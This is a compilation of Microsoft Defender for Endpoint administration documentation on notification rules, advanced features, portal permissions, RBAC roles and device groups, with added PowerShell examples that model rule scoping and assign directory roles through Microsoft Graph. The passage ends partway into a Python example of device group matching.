The notification rules allow you to set the vulnerability events that trigger notifications,
and add or remove email notification recipients. New recipients get notified about
vulnerabilities after they're added.

If you're using role-based access control (RBAC), recipients will only receive notifications
based on the device groups that were configured in the notification rule. Users with the
proper permission can only create, edit, or delete notifications that are limited to their
device group management scope. Only users assigned to the Global administrator role
can manage notification rules that are configured for all device groups.

The email notification includes basic information about the vulnerability event. There are
also links to filtered views in the Defender Vulnerability Management Security
recommendations and Weaknesses pages in the portal so you can further investigate.
For example, you could get a list of all exposed devices or get additional details about
the vulnerability.

Create rules for alert notifications


Create a notification rule to send an email when there are certain exploit or vulnerability
events, such as a new public exploit. For each rule, multiple event types can be selected.

1. Go to Microsoft Defender XDR and sign in using an account with the Security
administrator or Global administrator role assigned.

2. In the navigation pane, go to Settings > Endpoints > Email notifications >
Vulnerabilities.

3. Select Add notification rule.

4. Name the email notification rule and include a description.

5. Check Activate notification rule. Select Next.

6. Fill in the notification settings. Then select Next.

If you're using Defender for Endpoint, choose device groups to get
notifications for. (If you're using Defender for Business, device groups don't
apply.)

Choose the vulnerability event(s) that you want to be notified about when
they affect your organization:

New vulnerability found (including severity threshold)

Note

This includes newly detected zero-day vulnerabilities and patches released for
existing zero-day vulnerabilities. For more information, see patching zero-day
vulnerabilities.

Exploit was verified

New public exploit

Exploit added to an exploit kit

Include organization name if you want the organization name in the email.

7. Enter the recipient email address, then select Add. You can add multiple email
addresses.

8. Review the settings for the new email notification rule and select Create rule when
you're ready to create it.
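The way these rules scope delivery, both for the alert notification rules described in the previous article (device groups plus alert severities) and for the vulnerability notification rules above (event types plus a severity threshold), can be modelled in a few lines. The following is an added example written for this page, not code from Microsoft or from the product; the rule and event shapes, the severity ordering, the recipient addresses and the device group names are constructed assumptions, since the product exposes these settings only through the portal.

```powershell
# Added example for this page; not code from the Microsoft article or product.
# Models how notification rules scope delivery. All rules, recipients, device
# groups, event names and the severity ordering below are constructed assumptions.

# Assumed ordering of vulnerability severities, used for the rule threshold.
$vulnSeverity = @{ Low = 1; Medium = 2; High = 3; Critical = 4 }

function Get-AlertNotificationRecipients {
    param(
        [Parameter(Mandatory)] [hashtable] $Alert,   # keys: DeviceGroup, Severity
        [Parameter(Mandatory)] [object[]]  $Rules
    )
    $recipients = foreach ($rule in $Rules) {
        # AllDevices models the "all devices" option (Global administrator only);
        # otherwise the alert's device group must be one the rule was scoped to.
        $inScope = $rule.AllDevices -or ($rule.DeviceGroups -contains $Alert.DeviceGroup)
        if ($inScope -and ($rule.Severities -contains $Alert.Severity)) { $rule.Recipients }
    }
    return @($recipients | Sort-Object -Unique)
}

function Get-VulnerabilityNotificationRecipients {
    param(
        [Parameter(Mandatory)] [hashtable] $VulnEvent,   # keys: Type, Severity, DeviceGroups
        [Parameter(Mandatory)] [object[]]  $Rules
    )
    $recipients = foreach ($rule in $Rules) {
        if (-not $rule.Active) { continue }                         # rule not activated
        if ($rule.EventTypes -notcontains $VulnEvent.Type) { continue }
        # Only "new vulnerability found" events carry a severity threshold in the rule.
        if ($VulnEvent.Type -eq 'NewVulnerabilityFound' -and
            $vulnSeverity[$VulnEvent.Severity] -lt $vulnSeverity[$rule.SeverityThreshold]) { continue }
        # At least one affected device group must be one the rule covers.
        $overlap = @($VulnEvent.DeviceGroups | Where-Object { $rule.DeviceGroups -contains $_ })
        if ($overlap.Count -eq 0) { continue }
        $rule.Recipients
    }
    return @($recipients | Sort-Object -Unique)
}

# Constructed sample rules.
$alertRules = @(
    @{ Name = 'Global high'; AllDevices = $true;  DeviceGroups = @()
       Severities = @('High');           Recipients = @('soc-global@contoso.example') }
    @{ Name = 'EMEA';        AllDevices = $false; DeviceGroups = @('EMEA-Servers')
       Severities = @('Medium', 'High'); Recipients = @('soc-emea@contoso.example') }
)
$vulnRules = @(
    @{ Name = 'Exploits';     Active = $true; DeviceGroups = @('EMEA-Servers', 'APAC-Servers')
       EventTypes = @('NewPublicExploit', 'ExploitAddedToExploitKit'); SeverityThreshold = 'Low'
       Recipients = @('vuln-team@contoso.example') }
    @{ Name = 'Critical new'; Active = $true; DeviceGroups = @('EMEA-Servers')
       EventTypes = @('NewVulnerabilityFound'); SeverityThreshold = 'High'
       Recipients = @('patch-owners@contoso.example') }
)

# A Medium alert from a device group no rule is scoped to.
Get-AlertNotificationRecipients -Alert @{ DeviceGroup = 'APAC-Servers'; Severity = 'Medium' } -Rules $alertRules
# A High alert from an EMEA server.
Get-AlertNotificationRecipients -Alert @{ DeviceGroup = 'EMEA-Servers'; Severity = 'High' } -Rules $alertRules
# A new Medium vulnerability on EMEA servers, against a rule whose threshold is High.
Get-VulnerabilityNotificationRecipients -VulnEvent @{ Type = 'NewVulnerabilityFound'; Severity = 'Medium'; DeviceGroups = @('EMEA-Servers') } -Rules $vulnRules
# A new public exploit affecting APAC servers.
Get-VulnerabilityNotificationRecipients -VulnEvent @{ Type = 'NewPublicExploit'; Severity = 'High'; DeviceGroups = @('APAC-Servers') } -Rules $vulnRules
```

The point the model makes visible is the gap a scoped rule leaves: a recipient whose rule is limited to one device group never hears about alerts or vulnerabilities on devices outside it, and a threshold on "new vulnerability found" silently drops lower-severity findings. When recipients report missing mail, check the rule's device group scope and severity settings before looking at mail filters.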

Edit a notification rule


1. Select the notification rule you'd like to edit.

2. Select the Edit rule button next to the pencil icon in the flyout. Make sure you have
permission to edit or delete the rule.

Delete notification rule


1. Select the notification rule you'd like to delete.

2. Select the Delete button next to the trash can icon in the flyout. Make sure you
have permission to edit or delete the rule.

Troubleshoot email notifications for alerts


This section lists various issues that you may encounter when using email notifications
for alerts.

Problem: Intended recipients report they aren't getting the notifications.

Solution: Make sure that the notifications aren't blocked by email filters:

1. Check that the Defender for Endpoint email notifications aren't sent to the Junk
Email folder. Mark them as Not junk.
2. Check that your email security product isn't blocking the email notifications from
Defender for Endpoint.
3. Check your email application rules that might be catching and moving your
Defender for Endpoint email notifications.
Related articles
Defender Vulnerability Management overview
Security recommendations
Weaknesses
Event timeline


Configure advanced features in Defender for Endpoint
Article • 08/15/2023

Applies to:

Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Defender for Endpoint? Sign up for a free trial.

Depending on the Microsoft security products that you use, some advanced features
might be available for integrating Defender for Endpoint with those products.

Enable advanced features


1. Log in to Microsoft Defender XDR using an account with the Security
administrator or Global administrator role assigned.

2. In the navigation pane, select Settings > Endpoints > Advanced features.

3. Select the advanced feature you want to configure and toggle the setting between
On and Off.

4. Select Save preferences.

Use the following advanced features to get better protection from potentially malicious
files and gain better insight during security investigations.

Live response
Turn on this feature so that users with the appropriate permissions can start a live
response session on devices.

For more information about role assignments, see Create and manage roles.

Live response for servers


Turn on this feature so that users with the appropriate permissions can start a live
response session on servers.
For more information about role assignments, see Create and manage roles.

Live response unsigned script execution


Enabling this feature allows you to run unsigned scripts in a live response session.

Always remediate PUA


Potentially unwanted applications (PUA) are a category of software that can cause your
machine to run slowly, display unexpected ads, or at worst, install other software, which
might be unexpected or unwanted.

Turn on this feature so that potentially unwanted applications (PUA) are remediated on
all devices in your tenant even if PUA protection isn't configured on the devices. This
activation of the feature helps to protect users from inadvertently installing unwanted
applications on their device. When turned off, remediation is dependent on the device
configuration.

Restrict correlation to within scoped device groups

This configuration can be used for scenarios where local SOC operations would like to
limit alert correlation to the device groups that they can access. When this setting is
turned on, an incident composed of alerts that cross device groups is no longer
considered a single incident. The local SOC can then take action on the incident because
they have access to one of the device groups involved. However, the global SOC will see
several different incidents, split by device group, instead of one incident. We don't
recommend turning on this setting unless the benefit to local SOC operations outweighs
the benefits of incident correlation across the entire organization.

Note

Changing this setting impacts future alert correlations only.

Device group creation is supported in Defender for Endpoint Plan 1 and Plan
2.

Enable EDR in block mode


Endpoint detection and response (EDR) in block mode provides protection from
malicious artifacts, even when Microsoft Defender Antivirus is running in passive mode.
When turned on, EDR in block mode blocks malicious artifacts or behaviors that are
detected on a device. EDR in block mode works behind the scenes to remediate
malicious artifacts that are detected post breach.

Autoresolve remediated alerts


For tenants created on or after Windows 10, version 1809, the automated investigation
and remediation capability is configured by default to resolve alerts where the
automated analysis result status is "No threats found" or "Remediated". If you don't
want alerts to be auto-resolved, you need to manually turn off the feature.

Tip

For tenants created prior to that version, you'll need to manually turn this feature
on from the Advanced features page.

Note

The result of the auto-resolve action may influence the Device risk level
calculation, which is based on the active alerts found on a device.

If a security operations analyst manually sets the status of an alert to "In
progress" or "Resolved", the auto-resolve capability won't overwrite it.

Allow or block file


Blocking is only available if your organization fulfills these requirements:

Uses Microsoft Defender Antivirus as the active antimalware solution, and
The cloud-based protection feature is enabled

This feature enables you to block potentially malicious files in your network. Blocking a
file will prevent it from being read, written, or executed on devices in your organization.

To turn Allow or block files on:

1. In the navigation pane, select Settings > Endpoints > General > Advanced
features > Allow or block file.
2. Toggle the setting between On and Off.

3. Select Save preferences at the bottom of the page.

After turning on this feature, you can block files via the Add Indicator tab on a file's
profile page.

Hide potential duplicate device records


By enabling this feature, you can ensure that you're seeing the most accurate
information about your devices by hiding potential duplicate device records. There are
different reasons duplicate device records might occur, for example, the device
discovery capability in Microsoft Defender for Endpoint might scan your network and
discover a device that's already onboarded or has recently been offboarded.

This feature identifies potential duplicate devices based on their hostname and last
seen time. The duplicate devices are hidden from multiple experiences in the portal,
such as the Device Inventory, the Microsoft Defender Vulnerability Management pages, and
the public APIs for machine data, leaving the most accurate device record visible. However,
the duplicates are still visible in the global search, advanced hunting, alerts, and incidents
pages.

This setting is turned on by default and is applied tenant wide. If you don't want to hide
potential duplicate device records, you'll need to manually turn off the feature.
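To make the hostname-and-last-seen rule concrete, here is an added example (not code from Microsoft or from the product) that applies the logic the article describes to a constructed inventory; the record fields, the record sources and the sample records are assumptions.

```powershell
# Added example for this page; not code from the Microsoft article or product.
# Applies the stated rule: records sharing a hostname count as one device and only
# the most recently seen record stays visible. Fields and records are constructed.

function Split-DuplicateDeviceRecords {
    param([Parameter(Mandatory)] [object[]] $Records)   # each has Id, Hostname, Source, LastSeen
    $latest = @{}
    foreach ($record in $Records) {
        # Hostnames are compared case-insensitively; the later LastSeen wins.
        $key = $record.Hostname.ToLowerInvariant()
        if (-not $latest.ContainsKey($key) -or $record.LastSeen -gt $latest[$key].LastSeen) {
            $latest[$key] = $record
        }
    }
    $visibleIds = @($latest.Values | ForEach-Object Id)
    [pscustomobject]@{
        Visible = @($Records | Where-Object { $visibleIds -contains $_.Id })
        Hidden  = @($Records | Where-Object { $visibleIds -notcontains $_.Id })
    }
}

# Constructed inventory: a workstation onboarded earlier was rediscovered by device
# discovery later, and a server that was offboarded still has a stale record beside
# its re-onboarded one. One laptop has a single record.
$records = @(
    [pscustomobject]@{ Id = 'a1'; Hostname = 'WS-0042';  Source = 'Onboarded';  LastSeen = [datetime]'2024-01-10' }
    [pscustomobject]@{ Id = 'a2'; Hostname = 'ws-0042';  Source = 'Discovered'; LastSeen = [datetime]'2024-01-17' }
    [pscustomobject]@{ Id = 'b1'; Hostname = 'SRV-DB01'; Source = 'Offboarded'; LastSeen = [datetime]'2023-12-01' }
    [pscustomobject]@{ Id = 'b2'; Hostname = 'SRV-DB01'; Source = 'Onboarded';  LastSeen = [datetime]'2024-01-18' }
    [pscustomobject]@{ Id = 'c1'; Hostname = 'LT-0101';  Source = 'Onboarded';  LastSeen = [datetime]'2024-01-18' }
)

$result = Split-DuplicateDeviceRecords -Records $records
"Visible in inventory and machine APIs: $($result.Visible.Id -join ', ')"
"Hidden (still shown in advanced hunting, alerts, incidents): $($result.Hidden.Id -join ', ')"
```

Because the only grouping key is the hostname, two genuinely distinct devices that happen to share a name would also collapse to one visible record under this logic. The setting is tenant-wide, so the choice is between hiding such records in inventory and the machine APIs or turning the feature off; advanced hunting shows the duplicates either way, as the article notes.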

Custom network indicators


Turning on this feature allows you to create indicators for IP addresses, domains, or
URLs, which determine whether they'll be allowed or blocked based on your custom
indicator list.

To use this feature, devices must be running Windows 10 version 1709 or later, or
Windows 11. They should also have network protection in block mode and version
4.18.1906.3 or later of the antimalware platform (see KB 4052623).

For more information, see Manage indicators.

Note

Network protection leverages reputation services that process requests in locations
that might be outside of the location you've selected for your Defender for
Endpoint data.

Tamper protection
During some kinds of cyber attacks, bad actors try to disable security features, such as
antivirus protection, on your machines. Bad actors like to disable your security features
to get easier access to your data, to install malware, or to otherwise exploit your data,
identity, and devices. Tamper protection essentially locks Microsoft Defender Antivirus
and prevents your security settings from being changed through apps and methods.

For more information, including how to configure tamper protection, see Protect
security settings with tamper protection.

Show user details


Turn on this feature so that you can see user details stored in Microsoft Entra ID. Details
include a user's picture, name, title, and department information when investigating user
account entities. You can find user account information in the following views:

Alert queue
Device details page

For more information, see Investigate a user account.

Skype for Business integration


Enabling the Skype for Business integration gives you the ability to communicate with
users using Skype for Business, email, or phone. This activation can be handy when you
need to communicate with the user and mitigate risks.

Note

When a device is being isolated from the network, there's a pop-up where you can
choose to enable Outlook and Skype communications which allows
communications to the user while they are disconnected from the network. This
setting applies to Skype and Outlook communication when devices are in isolation
mode.

Office 365 Threat Intelligence connection

Important

This setting was used when Microsoft Defender for Office 365 and Microsoft
Defender for Endpoint were in different portals previously. After the convergence of
security experiences into a unified portal that is now called Microsoft Defender
XDR, these settings are irrelevant and don't have any functionality associated with
them. You can safely ignore the status of the control until it is removed from the
portal.

This feature is only available if you have an active subscription for Office 365 E5 or the
Threat Intelligence add-on. For more information, see the Office 365 E5 product page .

This feature enables you to incorporate data from Microsoft Defender for Office 365
into Microsoft Defender XDR to conduct a comprehensive security investigation across
Office 365 mailboxes and Windows devices.

Note

You'll need to have the appropriate license to enable this feature.

To receive contextual device integration in Office 365 Threat Intelligence, you'll need to
enable the Defender for Endpoint settings in the Security & Compliance dashboard. For
more information, see Threat investigation and response.
Endpoint Attack Notifications
Endpoint Attack Notifications enable Microsoft to actively hunt for critical threats to be
prioritized based on urgency and impact over your endpoint data.

For proactive hunting across the full scope of Microsoft Defender XDR, including threats
that span email, collaboration, identity, cloud applications, and endpoints, learn more
about Microsoft Defender Experts.

Microsoft Defender for Cloud Apps


Enabling this setting forwards Defender for Endpoint signals to Microsoft Defender for
Cloud Apps to provide deeper visibility into cloud application usage. Forwarded data is
stored and processed in the same location as your Defender for Cloud Apps data.

Note

This feature will be available with an E5 license for Enterprise Mobility + Security
on devices running Windows 10, version 1709 (OS Build 16299.1085 with
KB4493441 ), Windows 10, version 1803 (OS Build 17134.704 with KB4493464 ),
Windows 10, version 1809 (OS Build 17763.379 with KB4489899 ), later Windows
10 versions, or Windows 11.

Enable the Microsoft Defender for Endpoint integration from the Microsoft Defender for Identity portal

To receive contextual device integration in Microsoft Defender for Identity, you'll also
need to enable the feature in the Microsoft Defender for Identity portal.

1. Sign in to the Microsoft Defender for Identity portal with a Global Administrator
or Security Administrator role.

2. Select Create your instance.

3. Toggle the Integration setting to On and select Save.

After completing the integration steps on both portals, you'll be able to see relevant
alerts in the device details or user details page.

Web content filtering


Block access to websites containing unwanted content and track web activity across all
domains. To specify the web content categories you want to block, create a web content
filtering policy. Ensure that you have network protection in block mode when deploying
the Microsoft Defender for Endpoint security baseline.

Share endpoint alerts with Microsoft Purview compliance portal

Forwards endpoint security alerts and their triage status to Microsoft Purview
compliance portal, allowing you to enhance insider risk management policies with alerts
and remediate internal risks before they cause harm. Forwarded data is processed and
stored in the same location as your Office 365 data.

After configuring the Security policy violation indicators in the insider risk management
settings, Defender for Endpoint alerts will be shared with insider risk management for
applicable users.

Authenticated telemetry

You can turn on Authenticated telemetry to prevent spoofed telemetry from reaching your
dashboard.

Microsoft Intune connection


Defender for Endpoint can be integrated with Microsoft Intune to enable device risk-
based conditional access. When you turn on this feature, you'll be able to share
Defender for Endpoint device information with Intune, enhancing policy enforcement.

Important

You'll need to enable the integration on both Intune and Defender for Endpoint to
use this feature. For more information on specific steps, see Configure Conditional
Access in Defender for Endpoint.

This feature is only available if you have the following prerequisites:

A licensed tenant for Enterprise Mobility + Security E3, and Windows E5 (or
Microsoft 365 Enterprise E5)
An active Microsoft Intune environment, with Intune-managed Windows devices
Microsoft Entra joined.
Conditional Access policy
When you enable Intune integration, Intune will automatically create a classic
Conditional Access (CA) policy. This classic CA policy is a prerequisite for setting up
status reports to Intune. It shouldn't be deleted.

Note

The classic CA policy created by Intune is distinct from modern Conditional Access
policies, which are used for configuring endpoints.

Device discovery
Helps you find unmanaged devices connected to your corporate network without the
need for extra appliances or cumbersome process changes. Using onboarded devices,
you can find unmanaged devices in your network and assess vulnerabilities and risks.
For more information, see Device discovery.

Note

You can always apply filters to exclude unmanaged devices from the device
inventory list. You can also use the onboarding status column on API queries to
filter out unmanaged devices.

Preview features
Learn about new features in the Defender for Endpoint preview release. Try upcoming
features by turning on the preview experience.

You'll have access to upcoming features, which you can provide feedback on to help
improve the overall experience before features are generally available.

Download quarantined files


Back up quarantined files in a secure and compliant location so they can be downloaded
directly from quarantine. The Download file button is always available on the file
page. This setting is turned on by default. Learn more about requirements.

Streamlined connectivity during device onboarding (Preview)

This setting sets the default onboarding package to 'streamlined' for applicable
operating systems.

You will still have the option to use the standard onboarding package within the
onboarding page but you will need to specifically select it in the drop-down.

Related topics
Update data retention settings
Configure alert notifications


Use basic permissions to access the portal
Article • 02/21/2024

Applies to:

Microsoft Entra ID
Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Defender for Endpoint? Sign up for a free trial.

Refer to the instructions below to use basic permissions management.

You can use either of the following solutions:

Microsoft Graph PowerShell
Azure portal

For granular control over permissions, switch to role-based access control.

Assign user access using Microsoft Graph PowerShell

You can assign users with one of the following levels of permissions:

Full access (Read and Write)
Read-only access

Before you begin


Install Microsoft Graph PowerShell. For more information, see How to install
Microsoft Graph PowerShell.

Note

You need to run the PowerShell cmdlets in an elevated command line.

Connect to your Microsoft Entra ID. For more information, see Connect-MgGraph.

Full access: Users with full access can log in, view all system information and
resolve alerts, submit files for deep analysis, and download the onboarding
package. Assigning full access rights requires adding the users to the "Security
Administrator" or "Global Administrator" Microsoft Entra built-in roles.

Read-only access: Users with read-only access can log in, view all alerts, and
related information. They will not be able to change alert states, submit files for
deep analysis, or perform any state-changing operations. Assigning read-only access
rights requires adding the users to the "Security Reader" Microsoft Entra built-in
role.

Use the following steps to assign security roles:

For read and write access, assign users to the security administrator role by using
the following command:

PowerShell

# Look up the activated 'Security Administrator' directory role and the user's object ID.
$Role = Get-MgDirectoryRole -Filter "DisplayName eq 'Security Administrator'"
$UserId = (Get-MgUser -UserId "secadmin@Contoso.onmicrosoft.com").Id

# Reference the user as a directory object in the membership request body.
$DirObject = @{
    "@odata.id" = "https://graph.microsoft.com/v1.0/directoryObjects/$UserId"
}

# Add the user to the role (full access to the portal).
New-MgDirectoryRoleMemberByRef -DirectoryRoleId $Role.Id -BodyParameter $DirObject

For read-only access, assign users to the security reader role by using the
following command:

PowerShell

# Look up the activated 'Security Reader' directory role and the user's object ID.
$Role = Get-MgDirectoryRole -Filter "DisplayName eq 'Security Reader'"
$UserId = (Get-MgUser -UserId "reader@Contoso.onmicrosoft.com").Id

# Reference the user as a directory object in the membership request body.
$DirObject = @{
    "@odata.id" = "https://graph.microsoft.com/v1.0/directoryObjects/$UserId"
}

# Add the user to the role (read-only access to the portal).
New-MgDirectoryRoleMemberByRef -DirectoryRoleId $Role.Id -BodyParameter $DirObject

For more information, see Add or remove group members using Microsoft Entra ID.
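The two commands above assume the built-in role is already activated in the tenant and that the membership call took effect. The following is an added example, not from the Microsoft article or from the Graph PowerShell SDK documentation, that wraps the same cmdlets in those checks; the function names, the placeholder UPN, and the Graph permission scopes requested from Connect-MgGraph are this example's choices and are not stated in the article.

```powershell
# Added example for this page; not code from the Microsoft article or the Graph SDK.
# Wraps the article's role assignment in two checks: that the built-in role has
# been activated in the tenant (Get-MgDirectoryRole returns only activated roles),
# and that the member really landed in the role afterwards.

# RoleManagement.ReadWrite.Directory covers reading and changing directory role
# membership; User.Read.All lets the script resolve the user by UPN.
Connect-MgGraph -Scopes "RoleManagement.ReadWrite.Directory", "User.Read.All"

function Get-ActivatedDirectoryRole {
    param([Parameter(Mandatory)] [string] $DisplayName)
    $role = Get-MgDirectoryRole -Filter "DisplayName eq '$DisplayName'"
    if (-not $role) {
        # A built-in role that has never been used must be activated from its
        # template before members can be added to it.
        $template = Get-MgDirectoryRoleTemplate | Where-Object DisplayName -eq $DisplayName
        if (-not $template) { throw "No directory role template named '$DisplayName'." }
        $role = New-MgDirectoryRole -RoleTemplateId $template.Id
    }
    return $role
}

function Test-DirectoryRoleMember {
    param(
        [Parameter(Mandatory)] [string] $DirectoryRoleId,
        [Parameter(Mandatory)] [string] $UserId
    )
    $memberIds = @(Get-MgDirectoryRoleMember -DirectoryRoleId $DirectoryRoleId -All | ForEach-Object Id)
    return $memberIds -contains $UserId
}

function Grant-PortalReadOnlyAccess {
    param([Parameter(Mandatory)] [string] $UserPrincipalName)
    # Security Reader is the least-privileged built-in role the article maps to
    # read-only portal access; prefer it over Security Administrator unless the
    # user must change alert state or submit files.
    $role   = Get-ActivatedDirectoryRole -DisplayName 'Security Reader'
    $userId = (Get-MgUser -UserId $UserPrincipalName -Property Id).Id

    if (Test-DirectoryRoleMember -DirectoryRoleId $role.Id -UserId $userId) {
        return "$UserPrincipalName is already a Security Reader."
    }
    $body = @{ "@odata.id" = "https://graph.microsoft.com/v1.0/directoryObjects/$userId" }
    New-MgDirectoryRoleMemberByRef -DirectoryRoleId $role.Id -BodyParameter $body

    # Read the membership back rather than trusting the absence of an error.
    if (-not (Test-DirectoryRoleMember -DirectoryRoleId $role.Id -UserId $userId)) {
        throw "Membership for $UserPrincipalName was not confirmed."
    }
    return "$UserPrincipalName added to Security Reader."
}

# Placeholder UPN; replace with an account in your tenant.
Grant-PortalReadOnlyAccess -UserPrincipalName 'reader@contoso.onmicrosoft.com'
```

Run it in the elevated session the article calls for. The same pattern applies to full access by passing 'Security Administrator' to Get-ActivatedDirectoryRole, but because that role carries write access to the portal and beyond, assign it deliberately and review membership afterwards with Get-MgDirectoryRoleMember.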

Assign user access using the Azure portal


For more information, see Assign administrator and non-administrator roles to users
with Microsoft Entra ID.

Related topic
Manage portal access using RBAC


Assign user access
Article • 10/20/2023

Applies to:

Microsoft Entra ID
Office 365
Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Defender for Endpoint? Sign up for a free trial.

Defender for Endpoint supports two ways to manage permissions:

Basic permissions management: Set permissions to either full access or read-only.

Role-based access control (RBAC): Set granular permissions by defining roles,
assigning Microsoft Entra user groups to the roles, and granting the user groups
access to device groups. For more information on RBAC, see Manage portal access
using role-based access control.

Note

If you have already assigned basic permissions, you may switch to RBAC anytime.
Consider the following before making the switch:

Users with full access (users that are assigned the Global Administrator or
Security Administrator directory role in Microsoft Entra ID), are automatically
assigned the default Defender for Endpoint administrator role, which also has
full access. Additional Microsoft Entra user groups can be assigned to the
Defender for Endpoint administrator role after switching to RBAC. Only users
assigned to the Defender for Endpoint administrator role can manage
permissions using RBAC.
Users that have read-only access (Security Readers) will lose access to the
portal until they are assigned a role. Note that only Microsoft Entra user
groups can be assigned a role under RBAC.
After switching to RBAC, you will not be able to switch back to using basic
permissions management.
Device group creation is supported in Defender for Endpoint Plan 1 and Plan 2.

Related topics
Use basic permissions to access the portal
Manage portal access using RBAC


Create and manage roles for role-based access control
Article • 11/15/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Important

Some information in this article relates to prereleased product which may be
substantially modified before it's commercially released. Microsoft makes no
warranties, express or implied, with respect to the information provided here.

Create roles and assign the role to a Microsoft Entra group

The following steps guide you on how to create roles in Microsoft Defender XDR. It
assumes that you have already created Microsoft Entra user groups.

1. Log in to Microsoft Defender XDR using an account with the Security administrator or
Global administrator role assigned.

2. In the navigation pane, select Settings > Endpoints > Roles (under Permissions).

3. Select Add item.

4. Enter the role name, description, and permissions you'd like to assign to the role.

5. Select Next to assign the role to a Microsoft Entra Security group.

6. Use the filter to select the Microsoft Entra group that you'd like to add to this
role.

7. Save and close.


8. Apply the configuration settings.

Important

After creating roles, you'll need to create a device group and provide access to the
device group by assigning it to a role that you just created.

Note

Device group creation is supported in Defender for Endpoint Plan 1 and Plan 2.

Permission options
View data
Security operations - View all security operations data in the portal
Defender Vulnerability Management - View Defender Vulnerability
Management data in the portal

Active remediation actions


Security operations - Take response actions, approve or dismiss pending
remediation actions, manage allowed/blocked lists for automation and
indicators
Defender Vulnerability Management - Exception handling - Create new
exceptions and manage active exceptions
Defender Vulnerability Management - Remediation handling - Submit new
remediation requests, create tickets, and manage existing remediation activities
Defender Vulnerability Management - Application handling - Apply
immediate mitigation actions by blocking vulnerable applications, as part of the
remediation activity and manage the blocked apps and perform unblock actions

Security baselines
Defender Vulnerability Management - Manage security baselines assessment
profiles - Create and manage profiles so you can assess whether your devices comply
with security industry baselines.

Alerts investigation - Manage alerts, initiate automated investigations, run scans,
collect investigation packages, manage device tags, and download only portable
executable (PE) files

Manage portal system settings - Configure storage settings, SIEM and threat intel
API settings (applies globally), advanced settings, automated file uploads, roles and
device groups

Note

This setting is only available in the Microsoft Defender for Endpoint
administrator (default) role.

Manage security settings in Security Center - Configure alert suppression
settings, manage folder exclusions for automation, onboard and offboard devices,
manage email notifications, manage evaluation lab, and manage allowed/blocked
lists for indicators

Live response capabilities


Basic commands:
Start a live-response session
Perform read-only live-response commands on remote device (excluding file
copy and execution)
Download a file from the remote device via live response
Advanced commands:
Download PE and non-PE files from the file page
Upload a file to the remote device
View a script from the files library
Execute a script on the remote device from the files library

For more information on the available commands, see Investigate devices using Live
response.

Edit roles
1. Log in to Microsoft Defender XDR using an account with the Security administrator or
Global administrator role assigned.

2. In the navigation pane, select Settings > Endpoints > Roles (under Permissions).

3. Select the role you'd like to edit.

4. Click Edit.

5. Modify the details or the groups that are assigned to the role.

6. Click Save and close.


Delete roles
1. Log in to Microsoft Defender XDR using an account with the Security administrator or
Global administrator role assigned.

2. In the navigation pane, select Settings > Endpoints > Roles (under Permissions).

3. Select the role you'd like to delete.

4. Click the drop-down button and select Delete role.

Related topics
Use basic permissions to access the portal
Create and manage device groups


Create and manage device groups
Article • 10/20/2023

Applies to:

Microsoft Entra ID
Office 365
Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Note

Device group creation is supported in Defender for Endpoint Plan 1 and Plan 2.

In an enterprise scenario, security operation teams are typically assigned a set of
devices. These devices are grouped together based on a set of attributes such as their
domains, computer names, or designated tags.

In Microsoft Defender for Endpoint, you can create device groups and use them to:

Limit access to related alerts and data to specific Microsoft Entra user groups with
assigned RBAC roles
Configure different auto-remediation settings for different sets of devices
Assign specific remediation levels to apply during automated investigations
In an investigation, filter the Devices list to specific device groups by using the
Group filter.

You can create device groups in the context of role-based access (RBAC) to control who
can take specific action or see information by assigning the device group(s) to a user
group. For more information, see Manage portal access using role-based access control.

Tip

For a comprehensive look into RBAC application, read: Is your SOC running flat
with RBAC.

As part of the process of creating a device group, you'll:

Set the automated remediation level for that group. For more information on
remediation levels, see Use Automated investigation to investigate and remediate
threats.
Specify the matching rule that determines which devices belong to the group,
based on the device name, domain, tags, and OS platform. If a device is also
matched to other groups, it's added only to the highest ranked device group.
Select the Microsoft Entra user group that should have access to the device group.
Rank the device group relative to other groups after it's created.

Note

A device group is accessible to all users if you don't assign any Microsoft Entra
groups to it.

Create a device group

1. In the navigation pane, select Settings > Endpoints > Permissions > Device
groups.

2. Click Add device group.

3. Enter the group name and automation settings and specify the matching rule that
determines which devices belong to the group. See How the automated
investigation starts.

Tip

If you want to use tagging for grouping devices, see Create and manage
device tags.

4. Preview several devices that will be matched by this rule. If you're satisfied with the
rule, click the User access tab.

5. Assign the user groups that can access the device group you created.

Note

You can only grant access to Microsoft Entra user groups that have been
assigned to RBAC roles.

6. Click Close. The configuration changes are applied.

Note

Device Groups in Defender for Business are managed differently. For more
information, see Device groups in Microsoft Defender for Business.

Manage device groups

You can promote or demote the rank of a device group so that it's given higher or lower
priority during matching. A device group with a rank of 1 is the highest ranked group.
When a device is matched to more than one group, it's added only to the highest
ranked group. You can also edit and delete groups.

Warning

Deleting a device group may affect email notification rules. If a device group is
configured under an email notification rule, it will be removed from that rule. If the
device group is the only group configured for an email notification, that email
notification rule will be deleted along with the device group.

By default, device groups are accessible to all users with portal access. You can change
the default behavior by assigning Microsoft Entra user groups to the device group.

Devices that aren't matched to any groups are added to Ungrouped devices (default)
group. You cannot change the rank of this group or delete it. However, you can change
the remediation level of this group, and define the Microsoft Entra user groups that can
access this group.

Note

Applying changes to device group configuration may take up to several minutes.

Add device group definitions

Device group definitions can also include multiple values for each condition. You can set
multiple tags, device names, and domains to the definition of a single device group.

1. Create a new device group, then select the Devices tab.

2. Add the first value for one of the conditions.

3. Select + to add more rows of the same property type.

Tip

Use the 'OR' operator between rows of the same condition type, which allows
multiple values per property. You can add up to 10 rows (values) for each property
type - tag, device name, domain.

For more information on linking to device groups definitions, see Device groups -
Microsoft 365 security.
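The matching and ranking behaviour described in this article (rows of one property are OR'ed, at most 10 rows per property, a device matched by several groups lands only in the highest-ranked one, and unmatched devices fall into "Ungrouped devices (default)") can be modelled in a few lines. The following is an added example written for this page, not Microsoft's code. It assumes that conditions of different property types are AND'ed, that a property with no rows imposes no condition, that values are compared case-insensitively for exact equality, and that remediation-level labels such as "Full" and "Semi" are placeholders; the group and device names are constructed.

```python
"""Model of Defender for Endpoint device-group matching and ranking.

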